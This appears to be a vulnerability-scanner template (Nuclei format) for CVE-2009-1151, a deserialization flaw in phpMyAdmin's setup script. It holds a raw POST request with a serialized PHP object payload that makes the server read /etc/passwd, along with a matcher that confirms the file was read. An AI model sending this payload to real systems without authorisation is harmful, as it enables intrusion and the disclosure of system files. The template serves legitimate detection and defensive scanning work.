id: CVE-2009-1151 info: name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability author: princechaddha severity: high description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. reference: - https://www.phpmyadmin.net/security/PMASA-2009-3/ - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 classification: cve-id: CVE-2009-1151 tags: cve,cve2009,phpmyadmin,rce,deserialization requests: - raw: - | POST /scripts/setup.php HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: */* Content-Type: application/x-www-form-urlencoded action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:.*:0:0:"